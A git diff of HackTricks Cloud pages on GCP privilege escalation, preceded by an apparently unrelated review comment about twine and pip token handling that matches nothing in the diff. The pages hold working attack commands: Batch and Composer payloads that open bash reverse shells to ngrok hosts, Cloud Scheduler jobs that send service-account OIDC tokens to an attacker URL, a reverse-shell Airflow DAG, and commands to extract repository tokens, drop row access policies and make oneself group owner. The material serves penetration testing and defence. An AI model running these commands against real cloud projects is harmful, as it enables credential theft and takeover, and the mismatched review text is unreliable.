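Review bot: The twine step under "Now, lets upload the library" is wrapped in a four-backtick fence around the inner sh fence, so the command renders as literal text instead of a shell block; dropping the outer four-backtick lines fixes it. Both `twine upload --password "$(gcloud auth print-access-token)"` and the `pip install --index-url "https://oauth2accesstoken:$(...)@…"` form put the access token on the command line and in the URL, where it ends up in shell history and process listings; `TWINE_USERNAME`/`TWINE_PASSWORD` environment variables and a `PIP_INDEX_URL` set in the environment keep it out of argv, and `--trusted-host` is unnecessary for pkg.dev's valid TLS certificate and only weakens verification. For the CAUTION about re-tagging over an existing image, repositories created or updated with `--immutable-tags` reject a tag move, which is the control a defender would want named there. Typo: "Detele a full repository".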
@@ -0,0 +1,58 @@ +# GCP - Batch Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Batch + +Basic information: + +{{#ref}} +../gcp-services/gcp-batch-enum.md +{{#endref}} + +### `batch.jobs.create`, `iam.serviceAccounts.actAs` + +It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default). + +```bash +gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n" + } + } + ], + "volumes": [] + } + } + ], + "allocationPolicy": { + "instances": [ + { + "policy": { + "provisioningModel": "STANDARD", + "machineType": "e2-micro" + } + } + ] + }, + "logsPolicy": { + "destination": "CLOUD_LOGGING" + } +} +EOD +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md similarity index 58% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md index 9e71e3856..08f89c1d1 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md @@ -1,27 +1,14 @@ # GCP - BigQuery Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## BigQuery For more information about BigQuery check: -{% content-ref url="../gcp-services/gcp-bigquery-enum.md" %} -[gcp-bigquery-enum.md](../gcp-services/gcp-bigquery-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-bigquery-enum.md +{{#endref}} ### Read Table @@ -38,14 +25,13 @@ This is another way to access the data. **Export it to a cloud storage bucket** To perform this action the following permissions are needed: **`bigquery.tables.export`**, **`bigquery.jobs.create`** and **`storage.objects.create`**. ```bash -bq extract . "gs:///table*.csv" +bq extract .
"gs:///table*.csv" ``` ### Insert data It might be possible to **introduce certain trusted data** in a Bigquery table to abuse a **vulnerability in some other place.** This can be easily done with the permissions **`bigquery.tables.get`** , **`bigquery.tables.updateData`** and **`bigquery.jobs.create`**: -{% code overflow="wrap" %} ```bash # Via query bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)' @@ -53,7 +39,6 @@ bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, # Via insert param bq insert dataset.table /tmp/mydata.json ``` -{% endcode %} ### `bigquery.datasets.setIamPolicy` @@ -101,17 +86,15 @@ bq add-iam-policy-binding \ According to the docs, with the mention permissions it's possible to **update a row policy.**\ However, **using the cli `bq`** you need some more: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**. -{% code overflow="wrap" %} ```bash bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY ON `..` GRANT TO ("") FILTER USING (term = "Cfba");' # A example filter was used ``` -{% endcode %} It's possible to find the filter ID in the output of the row policies enumeration. Example: ```bash bq ls --row_access_policies :.
- + Id Filter Predicate Grantees Creation Time Last Modified Time ------------- ------------------ ----------------------------- ----------------- -------------------- apac_filter term = "Cfba" user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09 @@ -119,7 +102,6 @@ It's possible to find the filter ID in the output of the row policies enumeratio If you have **`bigquery.rowAccessPolicies.delete`** instead of `bigquery.rowAccessPolicies.update` you could also just delete the policy: -{% code overflow="wrap" %} ```bash # Remove one bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY ON `..`;' @@ -127,23 +109,8 @@ bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY ON `.< # Remove all (if it's the last row policy you need to use this bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `..`;' ``` -{% endcode %} -{% hint style="danger" %} -Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However this is prevented by bigquery. -{% endhint %} +> [!CAUTION] +> Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However this is prevented by bigquery. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md new file mode 100644 index 000000000..a79e4c231 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md @@ -0,0 +1,26 @@ +# GCP - ClientAuthConfig Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +### Create OAuth Brand and Client + +[**According to the docs**](https://cloud.google.com/iap/docs/programmatic-oauth-clients), these are the required permissions: + +- `clientauthconfig.brands.list` +- `clientauthconfig.brands.create` +- `clientauthconfig.brands.get` +- `clientauthconfig.clients.create` +- `clientauthconfig.clients.listWithSecrets` +- `clientauthconfig.clients.getWithSecret` +- `clientauthconfig.clients.delete` +- `clientauthconfig.clients.update` + +```bash +# Create a brand +gcloud iap oauth-brands list +gcloud iap oauth-brands create --application_title=APPLICATION_TITLE --support_email=SUPPORT_EMAIL +# Create a client of the brand +gcloud iap oauth-clients create projects/PROJECT_NUMBER/brands/BRAND-ID --display_name=NAME +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md similarity index 54% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md index 7cc370693..20d3d8d00 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md 
@@ -1,27 +1,14 @@ # GCP - Cloudbuild Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## cloudbuild For more information about Cloud Build check: -{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %} -[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-cloud-build-enum.md +{{#endref}} ### `cloudbuild.builds.create` @@ -42,7 +29,6 @@ TODO With this permission the user can get the **read access token** used to access the repository: -{% code overflow="wrap" %} ```bash curl -X POST \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ @@ -50,13 +36,11 @@ curl -X POST \ -d '{}' \ "https://cloudbuild.googleapis.com/v2/projects//locations//connections//repositories/:accessReadToken" ``` -{% endcode %} ### `cloudbuild.repositories.accessReadWriteToken` With this permission the user can get the **read and write access token** used to access the repository: -{% code overflow="wrap" %} ```bash curl -X POST \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ @@ -64,31 +48,15 @@ curl -X POST \ -d '{}' \ "https://cloudbuild.googleapis.com/v2/projects//locations//connections//repositories/:accessReadWriteToken" ``` -{% endcode %} ### `cloudbuild.connections.fetchLinkableRepositories` With this permission you can **get the repos the connection has access to:** -{% code overflow="wrap" %} ```bash curl -X GET \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ "https://cloudbuild.googleapis.com/v2/projects//locations//connections/:fetchLinkableRepositories" ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md similarity index 57% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md index 7d4c10c24..69b7d7841 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md @@ -1,27 +1,14 @@ # GCP - Cloudfunctions Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## cloudfunctions More information about Cloud Functions: -{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} -[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-cloud-functions-enum.md +{{#endref}} ### `cloudfunctions.functions.create` , `cloudfunctions.functions.sourceCodeSet`_,_ `iam.serviceAccounts.actAs` @@ -34,9 +21,8 @@ Exploit scripts for this method can be found [here](https://github.com/RhinoSecu An attacker with these privileges can **modify the code of a Function and even modify the service account attached** with the goal of exfiltrating the token. -{% hint style="danger" %} -In order to deploy cloud functions you will also need actAs permissions over the default compute service account or over the service account that is used to build the image. -{% endhint %} +> [!CAUTION] +> In order to deploy cloud functions you will also need actAs permissions over the default compute service account or over the service account that is used to build the image. Some extra privileges like `.call` permission for version 1 cloudfunctions or the role `role/run.invoker` to trigger the function might be required. @@ -70,9 +56,8 @@ gcloud functions deploy \ gcloud functions call ``` -{% hint style="danger" %} -If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it. -{% endhint %} +> [!CAUTION] +> If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it. The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py). 
@@ -80,7 +65,6 @@ The exploit script for this method can be found [here](https://github.com/RhinoS With this permission you can get a **signed URL to be able to upload a file to a function bucket (but the code of the function won't be changed, you still need to update it)** -{% code overflow="wrap" %} ```bash # Generate the URL curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \ @@ -88,7 +72,6 @@ curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/loca -H "Content-Type: application/json" \ -d '{}' ``` -{% endcode %} Not really sure how useful only this permission is from an attackers perspective, but good to know. @@ -106,17 +89,16 @@ If you have read and write access over the bucket you can monitor changes in the You can check more about the attack in: -{% content-ref url="gcp-storage-privesc.md" %} -[gcp-storage-privesc.md](gcp-storage-privesc.md) -{% endcontent-ref %} +{{#ref}} +gcp-storage-privesc.md +{{#endref}} However, you cannot use this to pre-compromise third party Cloud Functions because if you create the bucket in your account and give it public permissions so the external project can write over it, you get the following error: -
+
-{% hint style="danger" %} -However, this could be used for DoS attacks. -{% endhint %} +> [!CAUTION] +> However, this could be used for DoS attacks. ### Read & Write Access over Artifact Registry @@ -124,19 +106,6 @@ When a Cloud Function is created a new docker image is pushed to the Artifact Re ## References -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md new file mode 100644 index 000000000..f851a05d7 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md @@ -0,0 +1,34 @@ +# GCP - Cloudidentity Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Cloudidentity + +For more information about the cloudidentity service, check this page: + +{{#ref}} +../gcp-services/gcp-iam-and-org-policies-enum.md +{{#endref}} + +### Add yourself to a group + +If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group: + +```bash +gcloud identity groups memberships add --group-email --member-email [--roles OWNER] +# If --roles isn't specified you will get MEMBER +``` + +### Modify group membership + +If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of: + +```bash +# Check the current membership level +gcloud identity groups memberships describe --member-email --group-email + +# If not OWNER try +gcloud identity groups memberships modify-membership-roles --group-email --member-email --add-roles=OWNER +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md similarity index 64% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md index 72ae9590c..ed5dfa4ef 100644 
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md @@ -1,53 +1,36 @@ # GCP - Cloud Scheduler Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Cloud Scheduler More information in: -{% content-ref url="../gcp-services/gcp-cloud-scheduler-enum.md" %} -[gcp-cloud-scheduler-enum.md](../gcp-services/gcp-cloud-scheduler-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-cloud-scheduler-enum.md +{{#endref}} ### `cloudscheduler.jobs.create` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`) An attacker with these permissions could exploit **Cloud Scheduler** to **authenticate cron jobs as a specific Service Account**. By crafting an HTTP POST request, the attacker schedules actions, like creating a Storage bucket, to execute under the Service Account's identity. This method leverages the **Scheduler's ability to target `*.googleapis.com` endpoints and authenticate requests**, allowing the attacker to manipulate Google API endpoints directly using a simple `gcloud` command. -* **Contact any google API via`googleapis.com` with OAuth token header** +- **Contact any google API via`googleapis.com` with OAuth token header** Create a new Storage bucket: -{% code overflow="wrap" %} ```bash gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1 ``` -{% endcode %} To escalate privileges, an **attacker merely crafts an HTTP request targeting the desired API, impersonating the specified Service Account** -* **Exfiltrate OIDC service account token** +- **Exfiltrate OIDC service account token** -{% code overflow="wrap" %} ```bash gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...'] # 
Listen in the ngrok address to get the OIDC token in clear text. ``` -{% endcode %} If you need to check the HTTP response you might just t**ake a look at the logs of the execution**. @@ -55,17 +38,14 @@ If you need to check the HTTP response you might just t**ake a look at the logs Like in the previous scenario it's possible to **update an already created scheduler** to steal the token or perform actions. For example: -{% code overflow="wrap" %} ```bash gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...'] # Listen in the ngrok address to get the OIDC token in clear text. ``` -{% endcode %} Another example to upload a private key to a SA and impersonate it: -{% code overflow="wrap" %} ```bash # Generate local private key openssl req -x509 -nodes -newkey rsa:2048 -days 365 \ @@ -129,23 +109,9 @@ EOF # Activate the generated key gcloud auth activate-service-account --key-file=/tmp/lab.json ``` -{% endcode %} ## References -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md similarity index 58% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md index 525674236..5b5e8283e 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md @@ -1,27 +1,14 @@ # GCP - Composer Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## composer More info in: -{% content-ref url="../gcp-services/gcp-composer-enum.md" %} -[gcp-composer-enum.md](../gcp-services/gcp-composer-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-composer-enum.md +{{#endref}} ### `composer.environments.create` @@ -40,7 +27,6 @@ More info about the exploitation [**here**](https://github.com/carlospolop/gcp_p It's possible to update composer environment, for example, modifying env variables: -{% code overflow="wrap" %} ```bash # Even if it says you don't have enough permissions the update happens gcloud composer environments update \ @@ -63,7 +49,6 @@ X-Allowed-Locations: 0x0 {"config": {"softwareConfig": {"envVariables": {"BROWSER": "/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1' & #%s", "PYTHONWARNINGS": "all:0:antigravity.x:0:0"}}}} ``` -{% endcode %} TODO: Get RCE by adding new pypi packages to the environment @@ -71,28 +56,23 @@ TODO: Get RCE by adding new pypi packages to the environment Check the source code of the dags being executed: -{% code overflow="wrap" %} ```bash mkdir /tmp/dags gcloud composer environments storage dags export --environment --location --destination /tmp/dags ``` -{% endcode %} ### Import Dags Add the python DAG code into a file and import it running: -{% code overflow="wrap" %} ```bash # TODO: Create dag to get a rev shell gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py ``` -{% endcode %} Reverse shell DAG: -{% code title="reverse_shell.py" %} -```python +```python:reverse_shell.py import airflow from airflow import DAG from airflow.operators.bash_operator import BashOperator @@ -123,7 +103,6 @@ t1 = BashOperator( priority_weight=2**31 - 1, do_xcom_push=False) ``` -{% endcode %} ### Write Access to the Composer bucket 
@@ -131,9 +110,9 @@ All the components of a composer environments (DAGs, plugins and data) are store Get more info about this attack in: -{% content-ref url="gcp-storage-privesc.md" %} -[gcp-storage-privesc.md](gcp-storage-privesc.md) -{% endcontent-ref %} +{{#ref}} +gcp-storage-privesc.md +{{#endref}} ### Import Plugins @@ -143,17 +122,4 @@ TODO: Check what is possible to compromise by uploading plugins TODO: Check what is possible to compromise by uploading data -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md similarity index 56% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md index 2805df582..774b0c3ff 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md @@ -1,45 +1,31 @@ # GCP - Compute Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Compute For more information about Compute and VPC (netowork) in GCP check: -{% content-ref url="../../gcp-services/gcp-compute-instances-enum/" %} -[gcp-compute-instances-enum](../../gcp-services/gcp-compute-instances-enum/) -{% endcontent-ref %} +{{#ref}} +../../gcp-services/gcp-compute-instances-enum/ +{{#endref}} -{% hint style="danger" %} -Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached! -{% endhint %} +> [!CAUTION] +> Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached! ### `compute.projects.setCommonInstanceMetadata` With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. 
